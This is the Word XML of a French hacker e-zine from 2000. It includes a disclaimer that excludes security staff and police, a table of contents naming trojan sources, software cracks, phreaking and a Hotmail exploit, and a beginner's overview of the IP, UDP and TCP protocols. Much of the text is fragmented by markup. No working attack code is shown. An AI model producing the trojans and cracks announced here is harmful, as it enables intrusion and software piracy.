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----       ----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       ^              ------------------   ----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----  -----------------    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|      |   |          /    \            |                    |   |     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="008000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/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/   |               |    |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  ----    \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|      |   |         /      \    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|    ------------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|   |    /   /    |    ------------    |       |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|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|      |   |        /   / \   \         |    |   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|   |  /    /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>|    |               |        ----    /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------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|       /   /   \   \        |    |    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>|        /       |    ------------    |            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-------    |      /   /     \   \       |    |     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|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\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|               |    |      | \    \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|      |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|     /   -------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\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|    |    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>|   | \    \      |    ------------    |      |   \    \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|      |    |    /   ----------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\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|    ------------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  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|   |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>\    \    |    ------------    |      |     \    \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|   |      |    |   /   /            \   \   |                    |   |     \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\  |               |    |      |       \    \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  <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">----       ----   ----       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  ----  -----------------    ----       ----  -----------------    -------  </w:t>
      </w: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8000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      ----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8000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Black" w:cs="Arial Black" w:ascii="Arial Black" w:hAnsi="Arial Black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00FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Black" w:cs="Arial Black" w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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color w:val="0000FF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00FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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00FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Black" w:cs="Arial Black" w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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color w:val="0000FF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00FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>|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00FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0000FF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0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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color w:val="0000FF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0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Black" w:cs="Arial Black" w:ascii="Arial Black" w:hAnsi="Arial Black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--------------   --------------------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------------------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---------------      ----   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        |   |                   |   |    ----------    |    |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------     \     |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\         /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---------   -------      -------   |    |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   |    |    |   |      |     |    |     \       /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|    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 |     |          |    |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  |    |    |    ------     /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|      \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/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---------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|     |          |    |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|    |    |           ---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|    | \  -  /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>|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---------    |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|     |          |    |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|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|    |    | \    \         |    |  \   /  |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   |    |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|     |          |    |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|    |   \    \       |    |   \ /   |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---------    |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|     |          |    |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|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|    |    |     \    \     |    |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        |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|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         |    ----------    |    |    |       \    \   |    |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|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|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--------------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------         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------------------ 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eastAsia="Arial Black" w:cs="Arial Black" w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">   -----         ----   -----         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Black" w:hAnsi="Arial Black" w:eastAsia="Arial Black" w:cs="Arial Black"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INFORMATIONS LEGA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tte publication éléctronique peut contenir des information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onnées et articles interdits dans certains pays. Si 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formations de cette publication sont interdites dans un pay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est du devoir du lecteur de vérifier qu'il a bien le droit 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posséder et de lire cette publication.  Les auteurs et éditeurs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e sont en aucun cas responsables d'une mauvaise utilisation d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formations publiées. Les informations fournies dans cet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blication sont à titre informatifs unique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outefois, la diffusion et la lecture de ce bulletin PRIVE e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restreinte à toutes les personnes dans l'underground informatiqu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e font pas partie de l'underground informatique tel que je le conco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s personnes suivantes: Membres d'équipes de sécurité publiques o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ivées, personnes affiliées à des agences gouvernementale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formateurs quelconques, responsables sécurités et toute person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vant mettre un hacker en prison ou devant un tribunal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ire ce bulletin en n'étant pas dans l'underground informati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nstitue donc une violation des lois de Copyright et de Propriét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tellectuelle ainsi qu'un acte de malveillance envers les auteurs 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s rédacteurs car cela revient à lire des informations propriétair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NFORMATIONS SUR LE GROUPE ET L'E-MA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 - LE GROUP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mme de nombreuses personnes m'ont demandé d'écrire un e-mag qui rassemblera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 manière générale les quelques connaissances que j'ai acquise au cours de ma vi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formatique, j'ai décidé de lancer ce nouvel e-mag. A l'origine, HackerStorm e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nom de mon groupe de Hacker. Au bout de quelques années, et ne pouvant pl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'en occuper comme il le fallait, le groupe s'est dissous. Mais voici cet e-mag qui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je l'espère, va relancer tout ça et permettre au groupe de renaitre. Je vous appel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onc tous, hackers-phreakers-crackers de tous pays pour vous unir auto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'un e-mag --- HACKERSTORM'mag --- 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écrire un article, faire parti du groupe, être informé de toutes les dernières infos sortie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euillez nous contacter à HackerStorm@HotMail.Com.(merci d'avance de ne pas utiliser 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ploits Hotmail ni le spoof pour lire mes mails ou prendre ma boite aux lettres :-) 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I - L'E-MA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ce 1er mag du 07/2000, nous allons surtout donner des explications destin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ux débutants et au intermédiaire. Pour progresser dans ce merveilleux domai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'est le hacking, une connaissance parfaite des protocoles de communicatio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ici UDP/TCP/ICMP), des languages de programmations(ici C/C++ et surtou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isual-Basic car ce 1er mag est destiné aux débutants) ainsi que se qui e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ransmis entre les différents clients/servers est nécessaire. Vous pourrez auss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pprendre à cracker des logiciels, crypter vos données efficacement ou enco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endre connaissance des différentes techniques et montages éléctroniqu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'utilisent les phreaker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>SOMMAI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 - Hacking par KOP, Tipiax et Nos-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1 - Les différents protocoles de communications par Nos-K et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A - IP ( internet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B - UDP ( user datagram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a. Définition et Entête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9268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 xml:space="preserve">   b. Les Ports UD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C - TCP ( transfert control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a. Définition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b. Les 5 Caracteristique du TC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. Fiabilit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. La Fenetre =&gt; Nan c pas Windows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. Ports et Connexio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f. Ouverture active/passiv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g. Segments de Donné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D - ICMP ( Internet Control and error Message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2 - IRC, les échanges de données et comment devenir OP par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3 - PROXY et GATES par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A - Comment cela fonctionne et à quoi cela me sert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B - Exemple de proxy en Visual-Basi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4- Programmer un troyan en c++ par TiPia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A - Qu'est-ce qu'un troyan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B - Comment programmer en C++ windows une application client-server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C - La source du server Troya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I - Cracking par Tipia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1 - Explications sur le crack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2 - Principe de fonctionnement d'un debug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3 - Principe de fonctionnement d'un désassembl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4 - Exemple de crack: un programme(niveau débutant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 xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5 - Crack de Conseal Pc FireWall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 xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6 - Crack de Half-Life 1.1.0.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II - Crypter et cacher ses données par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1 - Cryptage avec fichier cl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2 - Cryptage par b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3 - Source d'un programme de cryptage avec fichier clé en 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4 - Cacher des données dans une image PC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V - Programmation Winsock par Nos-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1 - Qu'est-ce que winsock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2 - Les commandes de winso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3 - Application théori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 xml:space="preserve">      4 - Un bot simple en Visual Basi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5 - Un trojan en Visual Basi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6 - Conclusion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 - Phreaking par Elgadi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1 - Explications sur le phreak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2 - Conclus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I - Diver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1 - Emuler un trojan par Sbouby(trouvé par KOP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A - Informations sur les troja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B - Source pour l'émulateur de NETBUS (toutes versions)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C - Source pour l'émulateur de SUBSEVEN 2.1 GOL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2 - Source de l'émulateur NetBus en C++ par TiPia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u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      3 - Les œufs de Pâques par Lauspe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ab/>
        <w:t xml:space="preserve">      4 - L'Exploit HotMail par Lauspee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II - Le mot de la f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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                HACKING par KOP,Tipiax et Nos-K   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color w:val="0000FF"/>
        </w:rPr>
        <w:t>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1 - Les différents protocoles de communicatio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A - IP ( internet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ous avez certainement déjà vu une adresse IP. Il s'agit d'une suite de 4 nombres de 0 à 25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qui définissent un PC ou quoi que ce soit sur un réseau. Ex: 213.10.53.6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Dans un réseau, local ou externe, chaque PC a son adresse IP à el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Dans un packet, il y a 2 IPs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l'ip source : qui défini par qui a été envoyé le pa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l'ip destinataire : qui permet aux passerelles de router le packet vers le bon P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Une IP contient plusieurs donnée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la version : Version du protocol TCP/IP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le ToS : Type of Service. Cette variable permet soit d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minimiser le délai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minimiser le déb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minimiser le coût monétair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l'ID : Identificat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FragOff : Offset de fragmentation(division en plusieurs packets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TTL : Durée de vie (Time To Liv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C'est le nombre de machine que le packet est autorisé a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raverser avant de tomber en timeout et d'être détru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dest : adresse IP de destinat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source : adresse IP sourc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B - UDP ( user datagram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a. Définition et Entête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e protocole permet aux applications d'échanger des messages a travers le résea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avec un minimum de surchage (en-tete simplifiée comparé au TCP ;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ar l'UDP permet d'échanger des données sans connect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&lt;------------------ Bits -----------------&gt;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0                        |16                          |3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Port Source    | Port Destination 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Taille         | Somme de Controle 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Zone des Données....                  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'UDP est un protocole "Non fiable" car il ne comprend aucun mécanisme de sécurit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pour vérifier si ce qui a été envoyé est correctement arrivé là où il doit être ou s'il a ét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voyé par qui il doit être envoyé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e protocole est donc pratique pour les applications qui envoyent beaucoup de donn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non personnelles car comme l'entête des packets sont simplifié, on économise des oct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t le débit est dont supérieur. Il faut quand même ajouter que l'UDP incorpore une I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pour définir la source et le destinatair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9268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ab/>
        <w:tab/>
        <w:tab/>
        <w:t>b. Les Ports UDP</w:t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964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ab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Numéro </w:t>
        <w:tab/>
        <w:t xml:space="preserve">CODE </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Nom </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Description </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr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0 </w:t>
        <w:tab/>
        <w:t>--</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Réserver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7 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">ECHO </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Echo </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Echo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9 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">DISCARD </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Discard </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Détruire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1 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">USERS </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Systat </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Utilisateur actifs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3 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">DAYTIME </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Daytime </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Horodateur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5 </w:t>
        <w:tab/>
        <w:t>-</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Netstat </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Qui est actif, ou </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Netstat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">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7 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">QUOTE </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Qotd </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Fuseau horaire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9 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">CHARGEN </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Chargen </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Générateur de caractères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37 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">TIME </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Time </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Heure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42 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">NAMESERVERNameserver </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Machine serveur de noms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43 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">NICKNAME </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Whois </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Qui est-ce ;)) ?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53 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">DOMAIN </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Nameserver </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Serveur de nom de domaines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67 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">BOOTPS </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Bootps </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Serveur de protocole de bootstrap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68 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">BOOTPC </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Bootpc </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Client de protocole de bootstrap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69 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">TFTP </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Tftp </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Trivial FTP - </w:t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11 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">NTP </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Ntp </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Network Time Protocol</w:t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23 </w:t>
        <w:tab/>
        <w:t>-</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Snmp </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Moniteur d'administration de réseau SNMP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161 </w:t>
        <w:tab/>
        <w:t>-</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Snmp-trap </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Trappes SNMP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512 </w:t>
        <w:tab/>
        <w:t>-</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Biff </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Communication satellites UNIX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513 </w:t>
        <w:tab/>
        <w:t>-</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Who </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Démon UNIX "who"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514 </w:t>
        <w:tab/>
        <w:t>-</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Syslog </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Journalisation système </w:t>
        <w:tab/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520 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">RIP </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Rip </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Routing Information Protocole </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1165" w:leader="none"/>
          <w:tab w:val="left" w:pos="2730" w:leader="none"/>
          <w:tab w:val="left" w:pos="3835" w:leader="none"/>
          <w:tab w:val="left" w:pos="4260" w:leader="none"/>
          <w:tab w:val="left" w:pos="5254" w:leader="none"/>
          <w:tab w:val="left" w:pos="59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525 </w:t>
        <w:tab/>
        <w:t>-</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Timed </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Démon d'horodate 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u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>C. TCP : Transmission Control protocol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 xml:space="preserve">a. Définition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TCP constitue un service de remise assez fiable en mode connect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Il permet aux applications de ne pas avoir à se précoccuper de problèm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 fiabilité en s'adressant directement aux couches de remise non fiab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b. Les 5 Caracteristique du TC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Orientation connex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service transfère tous les flots de données emis par la station de dépar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Circuits Virtuel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orsqu'une machine désire s'adresser à une autre, il y a établissement d'u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ircuit virtuel, comme avec une communication téléphonique facturée par FT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(=&gt; reseau commuté). Les deux machines participantes peuvent se rendre comp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'une coupure de connection et en informer les applications concernées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Transfert Tamponné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Logiciel de communication peut décomposer arbitrairement les messag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émis par la station de départ. Lorsqu'il juge qu'un datagramme peut etre rempli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il procède a l'emission. Si l'emetteur souhaite que la transmission soit effectué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ans attente de remplissage, il utilise un ordre 'push' pour forcer l'emiss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Connexions non structur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a structuration des informations émises et reçues est controlée par les application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non par TCP. Il existe aucun moyen pour indiquer que tel ou tel message représen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un type d'information en particuli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Connexions Full Duple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s communications bidirectionnelles et simultanées. Ceci permet notam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'appliquer des techniques comme lePiggy Backing (Transmission simultané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 données et d'acquitements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c. Fiabilit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TCP assure une certaine sécurité au moyen d'un système d'acquitement/retransmiss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ab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Exemple de transmission réussi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**************           </w:t>
        <w:tab/>
        <w:t xml:space="preserve">                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Emission1            *------------|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*     </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> 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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">                *</w:t>
        <w:tab/>
        <w:t xml:space="preserve">           |-&gt;* Reception1 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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">                *</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">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Reception            *        &lt;--------------* Emission </w:t>
        <w:tab/>
        <w:t xml:space="preserve">          *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acquitement1      *   </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">* Acquitement 1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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">                *                             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Emission2            *--------------&gt;        * Reception 2  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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">                *</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">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                 *             |------------* Emission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Reception            * &lt;-|         </w:t>
        <w:tab/>
        <w:t>* Acquitement 2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acquitement2      *     </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>*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</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>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ab/>
        <w:tab/>
        <w:t>Exemple de problème de transmission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**************             </w:t>
        <w:tab/>
        <w:t>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Emission1             *------- Perte</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*     </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> 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*    Paquet</w:t>
        <w:tab/>
        <w:t xml:space="preserve">* Aquitement 1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*</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>* Non Transmis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Activation            *                            * </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">          *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Temporisation     *   </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">*  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">          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                  *                             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......                        *                             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</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> 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Temporisation     *                              *                      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Ecoulée                 *                             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</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> * </w:t>
        <w:tab/>
        <w:t xml:space="preserve">                 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Réemission 1        *------------|            *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*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">            |-&gt;* Reception1 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*</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
        <w:tab/>
        <w:t xml:space="preserve">* </w:t>
        <w:tab/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Reception             *       &lt;--------------* Emission </w:t>
        <w:tab/>
        <w:t xml:space="preserve">          *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acquitement1       *   </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">* Acquitement 1 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">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</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>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d. La Fenetre =&gt; Nan c pas Windows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i l'emetteur est obligé d'attendre un acquittement avant d'emettre le paquet suivant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il va en résulter une perte d'efficacité importante. Afin de réduire cette perte de temp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principe de la fenêtre glissante est utilisé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'emetteur peut alors envoyer un petit nombre de paquets avant d'être contrai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'attendre l'acquitemment du premier d'entre eux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ab/>
        <w:tab/>
        <w:t>Exempl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voi des 5 premiers paqu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_____________________________*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                                     *       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1</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   2</w:t>
        <w:tab/>
        <w:t xml:space="preserve">     3</w:t>
        <w:tab/>
        <w:t xml:space="preserve">     4</w:t>
        <w:tab/>
        <w:t xml:space="preserve">    5 *    6</w:t>
        <w:tab/>
        <w:t xml:space="preserve">           7</w:t>
        <w:tab/>
        <w:t xml:space="preserve">         8  |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</w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>*---------------------------------------------------*------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Récéption de l'accusé du 1, de la fenêtre avance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______*______________________ *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|</w:t>
        <w:tab/>
        <w:t>*</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
        <w:tab/>
        <w:t xml:space="preserve">      *</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">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|  1</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*   2    </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> 3         4          5         6 *</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> 7         8   |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</w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>|------------*-------------------------------------- *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ab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>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Plus la dimension de la fenetre est importante, plus le débit est élevé jusqu'à saturation du réseau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s performances en sont d'autant plus amélioré car la bande passantes est alors mieux exploit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</w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>e. Ports et Connexio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TCP permet a plusieurs processus d'applications de communiquer entre eux simultané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Tout comme UDP, il procède à un démultiplexages (répartition si on simplifie ;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s messages reçus et utilise un numéro de port pour adresser une destina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onnée sur une machine. TCP est basé sur une notion de connexion, aussi il utili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une paire (machine, port) pour indentifier une extrémité connex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Plusieurs connexions peuvent partager une extrémité de connexion aux messag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trant, il n'y a donc pas d'ambiguité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f. Ouverture active/passiv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Une application placée a l'une des extrémités indique a l'OS qu'elle accepte des deman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 connexion entrantes. Ce processus est appelé Ouverture Passive (un peu com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mode Listen de Winsock :)). A l'autre extrémité, l'aplication effectue une deman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'ouverture active auprès de son système. Les deux modules TCP commmuniqu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pour établir et tester la connexion entre les deux machines/processu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g. Segments de Donné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s flots de données sont perçu par TCP comme des séquences d'octets diviséé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 segment, à fin de transmission. Chaque segment est, en principe, transmis da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un seul datagramme. La fenetre d'anticipation (vous savez le gros machin en ASCII + haut :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st utilisée pour transmettre les segments et donc assurer une meilleur performan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s communication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Voici la structure d'un Segment TCP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|0  </w:t>
        <w:tab/>
        <w:t>|4</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> |10     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">   |16             |24  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">      |3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|------------|-------------|------------|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  Port TCP soure                     | Port destination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--------------------------|-----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     Numéro de Séquence             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-------------------------------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    Numéro d'accusé de reception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-------------------------------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Lgr          |Réservé | Bits          |     Fenètre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Entête     |               | Code        |    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|-----------|--------------|----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Total de contrôle                    | Pointeur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                                                  | D'urgence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--------------------------|-----------|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Option (éventuelles)                             |Bourrage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-------------------------------------|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                                      Données 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                                             ...        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------------------------------------------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(Hummm...c'est autre chose que l'UDP :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'entète TCP est composée de différent champ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Les Champs Port Source/Destina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s identifient les ports utilisés pour la connexion à chaque extrémité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dentifiant les deux application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Le Champs N° d'accusé de récép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 indique le numéro du prochain octet attendu par le recept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 fonctionne donc en sens inverse du N° de sequenc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Le Champs Lgr d'ente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 fournit la longueur de l'entête TCP exprimée en multiple de 32 bi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 est indispensable dans la mesure ou le champs option est de taille variab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Le champs Bits Co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Suivant le cas, les segments peuvent transporte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Des donn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Des accusés de récép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Des demande d'établissement de connex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Les 6 bits de ce champ identifient le type et donc le contenu du segment TCP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Bit De gauche                   Signification (drapea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à droite                               établi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urg             | Pointeur de données urgente Valide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Ack            | Champs d'accusé de récéption valide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Psh            | Push Requis                  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Rst             | Ré-initialisation de connection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Syn            | Synchronisation des N° de sequences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Fin             | Fin de données de l'émetteur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Le Champs Fenèt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 indique la taille du tampon de récéption et permet donc de connait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la quantité de données acceptable à chaque emission de seg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(exprimé sous forme d'un entier de 32 bits :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Emission Hors Ban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 est indispensable de pouvoir emettre et recevoir des signaux hors ban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afin de pouvoir notamment traiter les demandes d'interruption de process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notamment en provenance des utilisateur. Il serait dans le cas contrai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mpossible de terminer un processus lecteur de donné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Lors de la réception d'un segment disposant du drapeau 'Données urgente'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celui ci est transmis sans consideration de positionement dans le flo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TCP doit informer toutes applications connecté à ce port de bascul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en mode Urgent, état qu'elle conservera jusqu'à achevement du trait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des données urgen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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Le Champs Op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Lors de l'etablissement de la connection, les deux parties doivent négoci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la taille maximale de Segment (MMS pour les intimes ;)). Sur les machin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à faible débit, celle-ci doit étre ajusté de manière a remplir le seg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Extrémités de connexion placées sur un même réseau. La MMS e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 fixée de façon à fixer la taille du datagramme IP à celle de la MTU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Extrémités de connexion placées sur Deux réseaux différent. Il e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 suggéré d'employer un MTU de 536, soit une taille de 576 diminu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 de la taille standard des entêtes IP et TCP (40 :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ab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Le Champs Total de Contrô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La logique est la même que celle employée pour l'UDP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Ajout d'une pseudo entête complémenté à zéro pour ajuster la tail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 à un multiple de 16 b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Calcul du total de contrôle sur le segment obtenu sans tenir comp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des zéros et champ de contrôle reputé à zéro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 Complément à un de la somme des complément à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0 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">         8</w:t>
        <w:tab/>
        <w:t xml:space="preserve">                 16        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">         31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---------------------------------------------------------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                      Adresse IP Source                     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---------------------------------------------------------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                    Adresse IP destination                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-------------------|----------------|---------------------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 Zero                | Protocole    | Longueur TCP |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-------------------|----------------|---------------------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Accusé de récéption/émiss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Ils contiennent toujours le numéro du prochain octet attendu par le récépt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Celui-ci réorganise les séquences. Il accuse toujours récéption du plus long flo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de données qu'il a pu recevoir. L'emetteur est donc tenu, au fur et à mesure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au courant de l'état du transfer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h. Etablissement d'une connexion TC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a connexion débute à l'aide d'une séquence de synchronisation et d'émission d'accusé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***************************                ***************************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Emetteur *******************                 *Recepteur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*************                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Emission segment syn(n)              * ----------|  *                         </w:t>
        <w:tab/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                             *            |-&gt;*Reception segment syn(n)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                                                            *  |----------*Emission segment          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Reception Segment   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">              *&lt;-|             *Syn(n) et Ack(n+1        </w:t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Syn(n) et Ack(n+1)                         *                *                         </w:t>
        <w:tab/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Emission segment Ack(m+1)        * ----------|  *                         </w:t>
        <w:tab/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             </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">              *             |-&gt;*Reception segment        </w:t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         </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">              *                 *Ack(m+1)                 </w:t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*                </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">              *                 *                         </w:t>
        <w:tab/>
